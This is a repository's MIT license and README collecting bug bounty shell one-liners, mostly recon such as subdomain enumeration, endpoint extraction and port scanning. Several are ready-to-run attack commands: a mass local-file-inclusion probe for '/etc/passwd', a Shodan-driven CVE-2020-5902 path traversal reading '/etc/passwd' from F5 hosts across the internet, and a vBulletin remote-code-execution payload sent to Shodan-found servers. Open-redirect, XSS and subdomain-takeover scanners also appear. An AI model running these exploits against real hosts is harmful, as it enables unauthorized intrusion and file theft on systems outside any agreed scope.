├── LICENSE
└── README.md


/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2020 Dwi Siswanto
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # Awesome One-liner Bug Bounty [![Awesome](https://awesome.re/badge-flat2.svg)](https://awesome.re)
  2 | > A collection of awesome one-liner scripts especially for bug bounty.
  3 | 
  4 | This repository stores and houses various one-liner for bug bounty tips provided by me as well as contributed by the community. Your contributions and suggestions are heartily♥ welcome.
  5 | 
  6 | ---
  7 | 
  8 | ### Local File Inclusion
  9 | > @dwisiswant0
 10 | 
 11 | ```bash
 12 | gau $1 | gf lfi | qsreplace "/etc/passwd" | xargs -I % -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
 13 | ```
 14 | 
 15 | ### Open-redirect
 16 | > @dwisiswant0
 17 | 
 18 | ```bash
 19 | export LHOST="http://localhost"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
 20 | ```
 21 | 
 22 | ### XSS
 23 | > @cihanmehmet
 24 | 
 25 | ```bash
 26 | gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe -o result.txt
 27 | ```
 28 | 
 29 | ### CVE-2020-5902
 30 | > @Madrobot_
 31 | 
 32 | ```bash
 33 | shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done
 34 | ```
 35 | 
 36 | ### vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution
 37 | > @Madrobot_
 38 | 
 39 | ```bash
 40 | shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done;
 41 | ```
 42 | 
 43 | ### Find JS Files
 44 | > @D0cK3rG33k
 45 | 
 46 | ```bash
 47 | assetfinder site.com | gau|egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)'|while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Zo-9_]+" |sed -e 's, 'var','"$url"?',g' -e 's/ //g'|grep -v '.js'|sed 's/.*/&=xss/g'):echo -e "\e[1;33m$url\n" "\e[1;32m$vars";done
 48 | ```
 49 | 
 50 | ### Extract Endpoints from JS File
 51 | > @renniepak
 52 | 
 53 | ```bash
 54 | cat main.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | sort -u
 55 | ```
 56 | 
 57 | ### Get CIDR & Orgz from Target Lists
 58 | > @steve_mcilwain
 59 | 
 60 | ```bash
 61 | for DOMAIN in $(cat domains.txt);do echo $(for ip in $(dig a $DOMAIN +short); do whois $ip | grep -e "CIDR\|Organization" | tr -s " " | paste - -; d
 62 | one | uniq); done
 63 | ```
 64 | 
 65 | ### Get Subdomains from RapidDNS.io
 66 | > @andirrahmani1
 67 | 
 68 | ```bash
 69 | curl -s "https://rapiddns.io/subdomain/$1?full=1#result" | grep "<td><a" | cut -d '"' -f 2 | grep http | cut -d '/' -f3 | sed 's/#results//g' | sort -u
 70 | ```
 71 | 
 72 | ### Get Subdomains from BufferOver.run
 73 | > @\_ayoubfathi\_
 74 | 
 75 | ```bash
 76 | curl -s https://dns.bufferover.run/dns?q=.DOMAIN.com |jq -r .FDNS_A[]|cut -d',' -f2|sort -u
 77 | ```
 78 | 
 79 | ### Get Subdomains from Riddler.io
 80 | > @pikpikcu
 81 | ```bash
 82 | curl -s "https://riddler.io/search/exportcsv?q=pld:domain.com" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u 
 83 | ```
 84 | 
 85 | ### Get Subdomains from VirusTotal
 86 | > @pikpikcu
 87 | ```bash
 88 | curl -s "https://www.virustotal.com/ui/domains/domain.com/subdomains?limit=40" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
 89 | ```
 90 | 
 91 | ### Get Subdomains from CertSpotter
 92 | > @pikpikcu
 93 | ```bash
 94 | curl -s "https://certspotter.com/api/v0/certs?domain=domain.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
 95 | ```
 96 | 
 97 | ### Get Subdomains from Archive
 98 | > @pikpikcu
 99 | ```bash
100 | curl -s "http://web.archive.org/cdx/search/cdx?url=*.domain.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u
101 | ```
102 | 
103 | ### Get Subdomains from JLDC
104 | > @pikpikcu
105 | ```bash
106 | curl -s "https://jldc.me/anubis/subdomains/domain.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
107 | ```
108 | 
109 | ### Get Subdomains from crt.sh
110 | > @vict0ni
111 | 
112 | ```bash
113 | curl -s "https://crt.sh/?q=%25.$1&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
114 | ```
115 | 
116 | ### Sort & Tested Domains from Recon.dev
117 | > @stokfedrik
118 | 
119 | ```bash
120 | curl "https://recon.dev/api/search?key=apikey&domain=example.com" |jq -r '.[].rawDomains[]' | sed 's/ //g' | sort -u |httpx -silent
121 | ```
122 | 
123 | ### Find All Allocated IP ranges for ASN given an IP address
124 | > wains.be
125 | 
126 | ```bash
127 | whois -h whois.radb.net -i origin -T route $(whois -h whois.radb.net $1 | grep origin: | awk '{print $NF}' | head -1) | grep -w "route:" | awk '{print $NF}' | sort -n
128 | ```
129 | 
130 | ### Extract IPs from a File
131 | > @emenalf
132 | 
133 | ```bash
134 | grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' file.txt
135 | ```
136 | 
137 | ### Ports Scan without CloudFlare
138 | > @dwisiswant0
139 | 
140 | ```bash
141 | subfinder -silent -d uber.com | filter-resolved | cf-check | sort -u | naabu -rate 40000 -silent -verify | httprobe
142 | ```
143 | 
144 | ### Create Custom Wordlists
145 | > @tomnomnom
146 | 
147 | ```bash
148 | gau domain.com| unfurl -u keys | tee -a wordlist.txt ; gau domain.com | unfurl -u paths|tee -a ends.txt; sed 's#/#\n#g' ends.txt  | sort -u | tee -a wordlist.txt | sort -u ;rm ends.txt  | sed -i -e 's/\.css\|\.png\|\.jpeg\|\.jpg\|\.svg\|\.gif\|\.wolf\|\.bmp//g' wordlist.txt
149 | ```
150 | 
151 | ```bash
152 | cat domains.txt | httprobe | xargs curl | tok | tr '[:upper:]' '[:lower:]' | sort -u | tee -a words.txt  
153 | ```
154 | 
155 | ### Extracts Juicy Informations
156 | > @Prial Islam Khan
157 | 
158 | ```bash
159 | for sub in $(cat domains.txt);do /usr/bin/gron "https://otx.alienvault.com/otxapi/indicator/hostname/url_list/$sub?limit=100&page=1" | grep "\burl\b" | gron --ungron | jq |egrep -wi 'url' | awk '{print $2}' | sed 's/"//g'| sort -u | tee -a file.txt  ;done
160 | ```
161 | 
162 | ### Find Subdomains TakeOver
163 | > @hahwul
164 | 
165 | ```bash
166 | subfinder -d {target} >> domains ; assetfinder -subs-only {target} >> domains ; amass enum -norecursive -noalts -d {target} >> domains ; subjack -w domains -t 100 -timeout 30 -ssl -c ~/go/src/github.com/haccer/subjack/fingerprints.json -v 3 >> takeover ; 
167 | ```
168 | 
169 | ### Get multiple target's Custom URLs from ParamSpider
170 | > @hahwul
171 | 
172 | ```bash
173 | cat domains | xargs -I % python3 ~/tool/ParamSpider/paramspider.py -l high -o ./spidering/paramspider/% -d % ;
174 | ```
175 | 
176 | ### URLs Probing with cURL + Parallel
177 | > @akita_zen
178 | 
179 | ```bash
180 | cat alive-subdomains.txt | parallel -j50 -q curl -w 'Status:%{http_code}\t  Size:%{size_download}\t %{url_effective}\n' -o /dev/null -sk
181 | ```
182 | 
183 | ### Dump In-scope Assets from `chaos-bugbounty-list`
184 | > @dwisiswant0
185 | 
186 | ```bash
187 | curl -sL https://github.com/projectdiscovery/public-bugbounty-programs/raw/master/chaos-bugbounty-list.json | jq -r '.programs[].domains | to_entries | .[].value'
188 | ```
189 | 
190 | ### Dump In-scope Assets from `bounty-targets-data`
191 | > @dwisiswant0
192 | 
193 | #### HackerOne Programs
194 | 
195 | ```bash
196 | curl -sL https://github.com/arkadiyt/bounty-targets-data/blob/master/data/hackerone_data.json?raw=true | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type] | @tsv'
197 | ```
198 | 
199 | #### BugCrowd Programs
200 | 
201 | ```bash
202 | curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/bugcrowd_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'
203 | ```
204 | 
205 | #### Intigriti Programs
206 | 
207 | ```bash
208 | curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/intigriti_data.json | jq -r '.[].targets.in_scope[] | [.endpoint, .type] | @tsv'
209 | ```
210 | 
211 | #### YesWeHack Programs
212 | 
213 | ```bash
214 | curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/yeswehack_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'
215 | ```
216 | 
217 | #### HackenProof Programs
218 | 
219 | ```bash
220 | curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/hackenproof_data.json | jq -r '.[].targets.in_scope[] | [.target, .type, .instruction] | @tsv'
221 | ```
222 | 
223 | #### Federacy Programs
224 | 
225 | ```bash
226 | curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/federacy_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'
227 | ```
228 | 
229 | ###  Get all the urls out of a sitemap.xml
230 | > @healthyoutlet
231 | 
232 | ```bash
233 | curl -s domain.com/sitemap.xml | xmllint --format - | grep -e 'loc' | sed -r 's|</?loc>||g'
234 | ```
235 | 


--------------------------------------------------------------------------------